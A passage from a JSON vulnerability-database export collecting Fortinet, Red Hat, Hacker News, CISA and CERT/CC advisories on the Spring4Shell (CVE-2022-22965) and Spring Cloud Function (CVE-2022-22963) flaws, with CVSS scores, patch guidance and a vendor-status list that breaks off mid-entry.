"https://blog.qualys.com/category/qualys-insights", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fortinet": [{"lastseen": "2023-07-01T14:08:27", "description": "Two distinct Spring project vulnerabilities were released recently with critical CVSS scores and classified as zero-day attacks. \nThe two vulnerabilities are currently known as: \nCVE-2022-22965 or Spring4Shell: \nA Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. \nhttps://tanzu.vmware.com/security/cve-2022-22965 \n[https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html?fbclid=IwAR2fXxKQjG9vnJiOaXyZ1N_Ypx91TOzO6f48qGZRfKRzinYtD5nUCIptIjg&m=1](<https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html?fbclid=IwAR2fXxKQjG9vnJiOaXyZ1N_Ypx91TOzO6f48qGZRfKRzinYtD5nUCIptIjg&m=1>) \nCVE-2022-22963: \nIn Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing \nfunctionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that \nmay result in access to local resources. 
\n<https://tanzu.vmware.com/security/cve-2022-22963>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T00:00:00", "type": "fortinet", "title": "CVE-2022-22965 and CVE-2022-22963 vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T00:00:00", "id": "FG-IR-22-072", "href": "https://www.fortiguard.com/psirt/FG-IR-22-072", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhatcve": [{"lastseen": "2023-07-21T20:35:36", "description": "A flaw was found in Spring Cloud Function via the spring.cloud.function.routing-expression header that is modified by the attacker to contain malicious expression language code. The attacker is able to call functions that should not normally be accessible, including runtime exec calls.\n#### Mitigation\n\nAffected customers should update immediately as soon as patched software is available. There are no other mitigations available at this time. 
\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T18:32:29", "type": "redhatcve", "title": "CVE-2022-22963", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2023-04-06T09:43:13", "id": "RH:CVE-2022-22963", "href": "https://access.redhat.com/security/cve/cve-2022-22963", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:37:25", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgcabrqTD1UQL7HzljPrvwqXCYkv1djclox3AcQ8Na_vxMGVKwdIvy2QcZ94T6oEON-yCPdjn3NS1gjIhnvO0vhWztDQGuRG-vGMFK-4gF5h-JCwb15c_pE1mTCO9ZQFElckaP6p-wzLgC28Pp1MWGFMwW6ZXK8kjJu7rkmX4n7CbstCx-sROAhbl6t/s728-e100/java-spring-framework.jpg>)\n\nA zero-day remote code execution (RCE) vulnerability has come to light in the Spring framework shortly after a Chinese security researcher [briefly leaked](<https://twitter.com/vxunderground/status/1509170582469943303>) a [proof-of-concept](<https://github.com/tweedge/springcore-0day-en>) (PoC) 
[exploit](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) on GitHub before deleting their account.\n\nAccording to cybersecurity firm Praetorian, the unpatched flaw impacts Spring Core on Java Development Kit ([JDK](<https://en.wikipedia.org/wiki/Java_Development_Kit>)) versions 9 and later and is a bypass for another vulnerability tracked as [CVE-2010-1622](<https://nvd.nist.gov/vuln/detail/CVE-2010-1622>), enabling an unauthenticated attacker to execute arbitrary code on the target system.\n\nSpring is a [software framework](<https://en.wikipedia.org/wiki/Spring_Framework>) for building Java applications, including web apps on top of the Java EE (Enterprise Edition) platform.\n\n\"In certain configurations, exploitation of this issue is straightforward, as it only requires an attacker to send a crafted HTTP request to a vulnerable system,\" researchers Anthony Weems and Dallas Kaman [said](<https://www.praetorian.com/blog/spring-core-jdk9-rce/>). \"However, exploitation of different configurations will require the attacker to do additional research to find payloads that will be effective.\"\n\nAdditional details of the flaw, dubbed \"**SpringShell**\" and \"**Spring4Shell**,\" have been withheld to prevent exploitation attempts and until a fix is in place by the framework's maintainers, Spring.io, a subsidiary of VMware. 
It's also yet to be assigned a Common Vulnerabilities and Exposures (CVE) identifier.\n\nIt's worth noting that the flaw targeted by the zero-day exploit is different from two previous vulnerabilities disclosed in the application framework this week, including the Spring Framework expression DoS vulnerability ([CVE-2022-22950](<https://tanzu.vmware.com/security/cve-2022-22950>)) and the Spring Cloud expression resource access vulnerability ([CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>)).\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhravc9h6Jt8CniALz9rmUeOODWW7XOdJIlvXQbqQkpHJj5wBhPstmROb2bwynD_ugHL4A6E-wxt6DP6LTLoHFp7_ksvQ3j_SdaY4Y7l_XNW3trRxMFhWTLGm3Kju7DTSYzgG4TFLWcIcBi1hChVTWwYbalxyEWYe57BJjxvvGeqT46gjU6bHM1jJYd/s728-e100/whoami.jpg>)\n\nIn the interim, Praetorian researchers are recommending \"creating a ControllerAdvice component (which is a Spring component shared across Controllers) and adding dangerous patterns to the denylist.\"\n\nInitial analysis of the new code execution flaw in Spring Core suggests that its impact may not be severe. \"[C]urrent information suggests in order to exploit the vulnerability, attackers will have to locate and identify web app instances that actually use the DeserializationUtils, something already known by developers to be dangerous,\" Flashpoint [said](<https://www.flashpoint-intel.com/blog/what-is-springshell-what-we-know-about-the-springshell-vulnerability/>) in an independent analysis.\n\nDespite the public availability of PoC exploits, \"it's currently unclear which real-world applications use the vulnerable functionality,\" Rapid7 [explained](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>). 
\"Configuration and JRE version may also be significant factors in exploitability and the likelihood of widespread exploitation.\"\n\nThe Retail and Hospitality Information Sharing and Analysis Center (ISAC) also [issued a statement](<https://www.rhisac.org/press-release/spring-framework-rce-vulnerability/>) that it has investigated and confirmed the \"validity\" of the PoC for the RCE flaw, adding it's \"continuing tests to confirm the validity of the PoC.\"\n\n\"The Spring4Shell exploit in the wild appears to work against the stock 'Handling Form Submission' sample code from spring.io,\" CERT/CC vulnerability analyst Will Dormann [said](<https://twitter.com/wdormann/status/1509372145394200579>) in a tweet. \"If the sample code is vulnerable, then I suspect there are indeed real-world apps out there that are vulnerable to RCE.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T05:52:00", "type": "thn", "title": "Unpatched Java Spring Framework 0-Day RCE Bug Threatens Enterprise Web Apps Security", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": 
"PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22950", "CVE-2022-22963"], "modified": "2022-03-31T15:27:03", "id": "THN:51196AEF32803B9BBB839D4CADBF5B38", "href": "https://thehackernews.com/2022/03/unpatched-java-spring-framework-0-day.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-30T04:02:42", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgIeK3eJtR_et6MNbj0n-dcpg6m3XLALiJRPrhIA4yGOSfgFp4GFAJFR2Q3o31-tQcQpuVnc_WCTyR9yoih4dgeHa6orUrdUWCpDX1WWtymO1klV2EcDBa4OBds15BKHAGsEW3hPAVQ_HB772TkQVTfNrqyRvm5rY4qOkI7i3UarIAnOVC8LJfIZ0F3/s728-e100/CISA.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added 10 new actively exploited vulnerabilities to its [Known Exploited Vulnerabilities (KEV) Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), including a high-severity security flaw affecting industrial automation software from Delta Electronics.\n\nThe issue, tracked as [CVE-2021-38406](<https://nvd.nist.gov/vuln/detail/CVE-2021-38406>) (CVSS score: 7.8), impacts DOPSoft 2 versions 2.00.07 and prior. 
A successful exploitation of the flaw may lead to arbitrary code execution.\n\n\"Delta Electronics DOPSoft 2 lacks proper validation of user-supplied data when parsing specific project files (improper input validation) resulting in an out-of-bounds write that allows for code execution,\" CISA said in an alert.\n\nIt's worth noting that CVE-2021-38406 was originally disclosed as part of an industrial control systems (ICS) advisory [published](<https://www.cisa.gov/uscert/ics/advisories/icsa-21-252-02>) in September 2021.\n\nHowever, there are no patches that address the vulnerability, with CISA noting that the \"impacted product is end-of-life and should be disconnected if still in use.\" Federal Civilian Executive Branch (FCEB) agencies are mandated to follow the guideline by September 15, 2022.\n\nNot much information is available about the nature of the attacks that exploit the security bug, but a recent report from Palo Alto Networks Unit 42 [pointed out](<https://unit42.paloaltonetworks.com/recent-exploits-network-security-trends/>) instances of in-the-wild attacks leveraging the flaw between February and April 2022.\n\nThe development adds weight to the notion that adversaries are getting faster at exploiting newly published vulnerabilities when they are first disclosed, leading to indiscriminate and opportunistic scanning attempts that aim to take advantage of delayed patching.\n\nThese attacks often follow a specific sequence for exploitation that involves web shells, crypto miners, botnets, and remote access trojans (RATs), followed by initial access brokers (IABs) that then pave the way for ransomware.\n\nAmong other actively exploited flaws added to the list are as follows -\n\n * [**CVE-2022-26352**](<https://nvd.nist.gov/vuln/detail/CVE-2022-26352>) \\- dotCMS Unrestricted Upload of File Vulnerability\n * [**CVE-2022-24706**](<https://nvd.nist.gov/vuln/detail/CVE-2022-24706>) \\- Apache CouchDB Insecure Default Initialization of Resource Vulnerability\n 
* [**CVE-2022-24112**](<https://nvd.nist.gov/vuln/detail/cve-2022-24112>) \\- Apache APISIX Authentication Bypass Vulnerability\n * [**CVE-2022-22963**](<https://nvd.nist.gov/vuln/detail/CVE-2022-22963>) \\- VMware Tanzu Spring Cloud Function Remote Code Execution Vulnerability\n * [**CVE-2022-2294**](<https://nvd.nist.gov/vuln/detail/CVE-2022-2294>) \\- WebRTC Heap Buffer Overflow Vulnerability\n * [**CVE-2021-39226**](<https://nvd.nist.gov/vuln/detail/CVE-2021-39226>) \\- Grafana Authentication Bypass Vulnerability\n * [**CVE-2020-36193**](<https://nvd.nist.gov/vuln/detail/CVE-2020-36193>) \\- PEAR Archive_Tar Improper Link Resolution Vulnerability\n * [**CVE-2020-28949**](<https://nvd.nist.gov/vuln/detail/CVE-2020-28949>) \\- PEAR Archive_Tar Deserialization of Untrusted Data Vulnerability\n\n### iOS and macOS flaw added to the list\n\nAnother high-severity flaw added to the KEV Catalog is [**CVE-2021-31010**](<https://nvd.nist.gov/vuln/detail/CVE-2021-31010>) (CVSS score: 7.5), a deserialization issue in Apple's Core Telephony component that could be leveraged to circumvent sandbox restrictions.\n\nThe tech giant addressed the shortcoming in iOS 12.5.5, iOS 14.8, iPadOS 14.8, macOS Big Sur 11.6 (and Security Update 2021-005 Catalina), and watchOS 7.6.2 released in September 2021.\n\nWhile there were no indications that the flaw was being exploited at the time, the tech giant appears to have silently revised its advisories on May 25, 2022 to add the vulnerability and confirm that it had indeed been abused in attacks.\n\n\"Apple was aware of a report that this issue may have been actively exploited at the time of release,\" the iPhone maker noted, crediting Citizen Lab and Google Project Zero for the discovery.\n\nThe September update is also notable for [remediating](<https://thehackernews.com/2021/09/apple-issues-urgent-updates-to-fix-new.html>) CVE-2021-30858 and CVE-2021-30860, both of which were [employed by NSO 
Group](<https://thehackernews.com/2021/08/bahraini-activists-targeted-using-new.html>), the makers of the Pegasus spyware, to get around the operating systems' security features.\n\nThis raises the possibility that CVE-2021-31010 may have been strung together with the aforementioned two flaws in an attack chain to escape the sandbox and achieve arbitrary code execution.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-29T04:23:00", "type": "thn", "title": "CISA Adds 10 New Known Actively Exploited Vulnerabilities to its Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28949", "CVE-2020-36193", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-31010", "CVE-2021-38406", "CVE-2021-39226", "CVE-2022-2294", "CVE-2022-22963", "CVE-2022-24112", "CVE-2022-24706", "CVE-2022-26352"], "modified": 
"2022-08-30T03:22:27", "id": "THN:5D50D5AA81EE14FA1044614364EAEBC6", "href": "https://thehackernews.com/2022/08/cisa-adds-10-new-known-actively.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2022-04-07T11:27:17", "description": "Spring by VMWare has released Spring Cloud Function versions 3.1.7 and 3.2.3 to address remote code execution (RCE) vulnerability CVE-2022-22963 as well as Spring Framework versions 5.3.18 and 5.2.20 to address RCE vulnerability CVE-2022-22965, known as \u201cSpring4Shell.\u201d A remote attacker could exploit these vulnerabilities to take control of an affected system.\n\nAccording to VMware, the Spring4Shell vulnerability bypasses the patch for [CVE-2010-1622](<https://nvd.nist.gov/vuln/detail/CVE-2010-1622>), causing CVE-2010-1622 to become exploitable again. The bypass of the patch can occur because Java Development Kit (JDK) versions 9 and later provide two sandbox restriction methods, providing a path to exploit CVE-2010-1622 (JDK versions before 9 only provide one sandbox restriction method).\n\nCISA encourages users and administrators to immediately apply the necessary updates in the Spring Blog posts that provide the [Spring Cloud Function updates addressing CVE-2022-22963](<https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function>) and the [Spring Framework updates addressing CVE-2022-22965](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>). CISA also recommends reviewing VMWare Tanzu Vulnerability Report [CVE-2022-22965: Spring Framework RCE via Data Binding on JDK 9+](<https://tanzu.vmware.com/security/cve-2022-22965>) and CERT Coordination Center (CERT/CC) Vulnerability Note [VU #970766](<https://www.kb.cert.org/vuls/id/970766>) for more information. 
\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/04/01/spring-releases-security-updates-addressing-spring4shell-and>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T00:00:00", "type": "cisa", "title": "Spring Releases Security Updates Addressing \"Spring4Shell\" and Spring Cloud Function Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T00:00:00", "id": "CISA:6CCB59AFE6C3747D79017EDD3CC21673", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/04/01/spring-releases-security-updates-addressing-spring4shell-and", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2023-07-22T11:15:11", "description": "### Overview\n\nThe Spring Framework insecurely 
handles PropertyDescriptor objects, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description\n\nThe [Spring Framework](<https://spring.io/>) is a Java framework that can be used to create applications such as web applications. Due to improper handling of PropertyDescriptor objects used with data binding, Java applications written with Spring may allow for the execution of arbitrary code.\n\nExploit code that targets affected WAR-packaged Java code for tomcat servers is publicly available.\n\nNCSC-NL has a [list of products and their statuses](<https://github.com/NCSC-NL/spring4shell/blob/main/software/README.md>) with respect to this vulnerability.\n\n### Impact\n\nBy providing crafted data to a Spring Java application, such as a web application, an attacker may be able to execute arbitrary code with the privileges of the affected application. Depending on the application, exploitation may be possible by a remote attacker without requiring authentication.\n\n### Solution\n\n#### Apply an update\n\nThis issue is addressed in Spring Framework 5.3.18 and 5.2.20. 
Please see the [Spring Framework RCE Early Announcement](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) for more details.\n\n### Acknowledgements\n\nThis issue was publicly disclosed by heige.\n\nThis document was written by Will Dormann\n\n### Vendor Information\n\n970766\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Blueriq __ Affected\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.blueriq.com/en/insights/measures-cve22950-22963-22965>\n\n### BMC Software __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-06 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://bmcsites.force.com/casemgmt/sc_KnowledgeArticle?sfdcid=000395541>\n\n### Cisco __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 07, 2022**\n\n**CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nCisco is aware of the vulnerability identified by CVE ID CVE-2022-22950 and with the title \"Spring Expression DoS Vulnerability\". We are following our well-established process to investigate all aspects of the issue. 
If something is found that our customers need to be aware of and respond to, we will communicate via our established disclosure process.\n\n#### References\n\n * <https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67>\n\n### Dell __ Affected\n\nUpdated: 2022-04-20 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://www.dell.com/support/home/en-us/drivers/driversdetails?driverid=0vdcg&oscode=naa&productcode=wyse-wms](<https://www.dell.com/support/home/en-us/drivers/driversdetails?driverid=0vdcg&oscode=naa&productcode=wyse-wms>)\n\n### JAMF software __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-04 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.jamf.com/t5/jamf-pro/spring4shell-vulnerability/td-p/262584>\n\n### NetApp __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://security.netapp.com/advisory/ntap-20220401-0001/>\n\n### PTC __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-04 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://www.ptc.com/en/support/article/cs366379?language=en&posno=1&q=CVE-2022-22965&source=search](<https://www.ptc.com/en/support/article/cs366379?language=en&posno=1&q=CVE-2022-22965&source=search>)\n\n### SAP SE __ Affected\n\nUpdated: 2022-04-13 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * 
[https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n\n### Siemens __ Affected\n\nUpdated: 2022-04-27 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://cert-portal.siemens.com/productcert/pdf/ssa-254054.pdf>\n\n### SolarWinds __ Affected\n\nNotified: 2022-04-02 Updated: 2022-04-06\n\n**Statement Date: April 04, 2022**\n\n**CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received any reports of these issues from SolarWinds customers but are actively investigating. The following SolarWinds product do utilize the Spring Framework, but have not yet been confirmed to be affected by this issue: \u2022 Security Event Manager (SEM) \u2022 Database Performance Analyzer (DPA) \u2022 Web Help Desk (WHD) While we have not seen or received reports of SolarWinds products affected by this issue, for the protection of their environments, SolarWinds strongly recommends all customers disconnect their public-facing (internet-facing) installations of these SolarWinds products (SEM, DPA, and WHD) from the internet.\n\n#### References\n\n * <https://www.solarwinds.com/trust-center/security-advisories/spring4shell>\n\n### Spring __ Affected\n\nNotified: 2022-03-31 Updated: 2022-03-31\n\n**Statement Date: March 31, 2022**\n\n**CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://tanzu.vmware.com/security/cve-2022-22965>\n * <https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>\n\n### VMware __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-03 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * 
<https://www.vmware.com/security/advisories/VMSA-2022-0010.html>\n\n### Aruba Networks __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 07, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nAruba Networks is aware of the issue and we have published a security advisory for our products at https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2022-006.txt\n\n### Check Point __ Not Affected\n\nUpdated: 2022-04-12 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk178605&src=securityAlerts](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk178605&src=securityAlerts>)\n\n### Commvault __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://documentation.commvault.com/v11/essential/146231_security_vulnerability_and_reporting.html#cv2022041-spring-framework>\n\n### Elastic __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://discuss.elastic.co/t/spring4shell-spring-framework-remote-code-execution-vulnerability/301229>\n\n### F5 Networks __ Not Affected\n\nNotified: 2022-04-01 Updated: 2022-04-20\n\n**Statement Date: April 15, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nF5 products and services and NGINX products are not affected by CVE-2022-22965.\n\n#### References\n\n * <https://support.f5.com/csp/article/K11510688>\n\n### Jenkins __ Not Affected\n\nNotified: 2022-04-06 Updated: 
2022-04-02 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.jenkins.io/blog/2022/03/31/spring-rce-CVE-2022-22965/>\n\n### Micro Focus __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://portal.microfocus.com/s/article/KM000005107?language=en_US>\n\n### Okta Inc. __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-04 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://sec.okta.com/articles/2022/04/oktas-response-cve-2022-22965-spring4shell>\n\n### Palo Alto Networks __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://security.paloaltonetworks.com/CVE-2022-22963>\n\n### Pulse Secure __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB45126/?kA13Z000000L3sW>\n\n### Red Hat __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 08, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nNo Red Hat products are affected by CVE-2022-22963.\n\n### salesforce.com __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://kb.tableau.com/articles/Issue/Spring4Shell-CVE-2022-22963-and-CVE-2022-22965>\n\n### 
